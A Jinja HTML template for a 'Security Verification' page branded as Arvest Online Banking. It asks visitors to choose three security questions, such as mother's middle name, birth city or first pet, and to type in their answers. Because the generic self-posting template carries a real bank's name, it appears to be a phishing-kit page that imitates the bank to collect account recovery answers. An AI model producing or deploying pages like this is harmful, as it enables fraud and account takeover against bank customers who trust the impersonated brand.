{% extends 'base.html'%} {%block body%}

<div style="padding-top: 5px" class="middle-form">
  <p
    class="go-left"
    style="font-size: 30px; text-align: center"
  >
    Security Verification <br />
  </p>

  <div class="submitForm">
    <form action="" method="post">
      <div class="input-field">
        <label for="question1">Question 1</label>
        <select
          name="q1"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="In what city was your high school? (full name of
          city only)?">
            In what city was your high school? (full name of
city only)
          </option>
          <option
          value="In what city were you married? (Enter full name
          of city)?"
        >
        In what city were you married? (Enter full name
        of city)
        </option>
          <option value="What is your maternal grandmother's first name?">
            What is your maternal grandmother's first name?
          </option>
          <option
            value="What is your father's middle name?"
          >
          What is your father's middle name?
          </option>
          <option value="What was the name of your High School?">
            What was the name of your High School?
          </option>
          <option value="What is the name of the first company you
          worked for?">
            What is the name of the first company you
worked for?
          </option>
          <option value="What is the first name of the maid of honor at
          your wedding?">
            What is the first name of the maid of honor at
your wedding?
          </option>
          <option value="What is the first name of your
          oldest nephew?">
            What is the first name of your
oldest nephew?
          </option>
          <option value="What is your maternal grandfather's first name?">
            What is your maternal grandfather's first name?
          </option>
          <option value="What is your best friend's first name?">
            What is your best friend's first name?
          </option>
          <option
            value="What is the first name of the best man at
            your wedding?"
          >
          What is the first name of the best man at
          your wedding?
          </option>
          <option value="What was the nickname of your grandfather?">
            What was the nickname of your grandfather?
          </option>
          <option value="What was your high school mascot?">
            What was your high school mascot?
          </option>
          <option value="What was the first name of your first manager?">
            What was the first name of your first manager?
          </option>
          <option value="In what city was your father born? (Enter full
          name of city only)">
            In what city was your father born? (Enter full
name of city only)
          </option>
          <option value="What was the name of your first
          girlfriend/boyfriend?">
            What was the name of your first
            girlfriend/boyfriend?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question1_ans">Answer</label>
        <input id="question1_ans" name="ans1" type="text" />
      </div>

      <!-- Question 2 -->
      <div class="input-field">
        <label for="question1">Question 2</label>
        <select
          name="q2"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="What was the name of your first pet?">
            What was the name of your first pet?
          </option>
          <option
          value="What is the first name of your oldest niece?"
        >
        What is the first name of your oldest niece?
        </option>
          <option value="What is your paternal grandmother's first name?">
            What is your paternal grandmother's first name?
          </option>
          <option
            value="In what city is your vacation home? (Enter full
            name of city only)"
          >
          In what city is your vacation home? (Enter full
          name of city only)
          </option>
          <option value="What is the first name of the best man at
          your wedding?">
            What is the first name of the best man at
your wedding?
          </option>
          <option value="What was the nickname of your grandfather?">
            What was the nickname of your grandfather?
          </option>
          <option value="What was your high school mascot?">
            What was your high school mascot?
          </option>
          <option value="What was the first name of your first manager?">
            What was the first name of your first manager?
          </option>
          <option value="In what city was your father born? (Enter full
          name of city only)">
            In what city was your father born? (Enter full
name of city only)
          </option>
          <option value="What was the name of your first
          girlfriend/boyfriend?">
            What was the name of your first
girlfriend/boyfriend?
          </option>
          <option
            value="What was the name of your first pet?"
          >
          What was the name of your first pet?
          </option>
          <option value="What is the first name of your oldest niece?">
            What is the first name of your oldest niece?
          </option>
          <option value="What is your paternal grandmother's first name?">
            What is your paternal grandmother's first name?
          </option>
          <option value="In what city is your vacation home? (Enter full
          name of city only)">
            In what city is your vacation home? (Enter full
name of city only)
          </option>
          <option value="In what city was your mother born? (Enter full
          name of city only)">
            In what city was your mother born? (Enter full
name of city only)
          </option>
          <option value="What street did your best friend in high school live on? (Enter full name of street only)">
            What street did your best friend in high school live on? (Enter full name of street only)
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question2_ans">Answer</label>
        <input id="question2_ans" name="ans2" type="text" />
      </div>

      <!-- Question 3 -->
      <div class="input-field">
        <label for="question1">Question 3</label>
        <select
          name="q3"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="What is your mother's middle name?">
            What is your mother's middle name?
          </option>
          <option value="In what city were you born? (Enter full name of
          city only)">
            In what city were you born? (Enter full name of
city only)
          </option>
          <option
            value="Where did you meet your spouse for the first
            time? (Enter full name of city only)"
          >
          Where did you meet your spouse for the first
          time? (Enter full name of city only)
          </option>
          <option value="What was your favorite restaurant in college?">
            What was your favorite restaurant in college?
          </option>
          <option value="What is your paternal grandfather's first name?">
            What is your paternal grandfather's first name?
          </option>
          <option value="What was the name of your junior high school?(Enter only Riverdale for Riverdale Junior High
          School) ">
            What was the name of your junior high school? (Enter only "Riverdale" for Riverdale Junior High
            School)
          </option>
          <option value="What was the last name of your favorite
          teacher in final year of high school?">
            What was the last name of your favorite
teacher in final year of high school?
          </option>
          <option value="What was the name of the town your
          grandmother lived in? (Enter full name of town
          only)">
            What was the name of the town your
grandmother lived in? (Enter full name of town
only)
          </option>
          <option value="What is the middle name of your oldest sibling?">
            What is the middle name of your oldest sibling?
          </option>
          <option
            value="What is the first and last name of your oldest cousin?"
          >
            What is the first and last name of your oldest cousin?
          </option>
          <option value="What color was your first car?">
            What color was your first car?
          </option>
          <option value="What’s your Favourite teachers name?">
            What’s your Favourite teachers name?
          </option>
          <option value="What’s your brother/sisters nickname?">
            What’s your brother/sisters nickname?
          </option>
          <option value="What’s your favorite board game?">
            What’s your favorite board game?
          </option>
          <option value="What is your favorite museum or cultural institution?">
            What is your favorite museum or cultural institution?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question3_ans">Answer</label>
        <input id="question3_ans" name="ans3" type="text" />
      </div>

      <button style="width: 100%; margin-top: -5px" type="submit">
        Verify
      </button>
    </form>
    <br />

    <p>Unauthorized access is prohibited. Usage may be monitored</p>

    <hr>

    <p>Have questions about Arvest Online Banking?</p>
   

    
  </div>
</div>

{%endblock%}
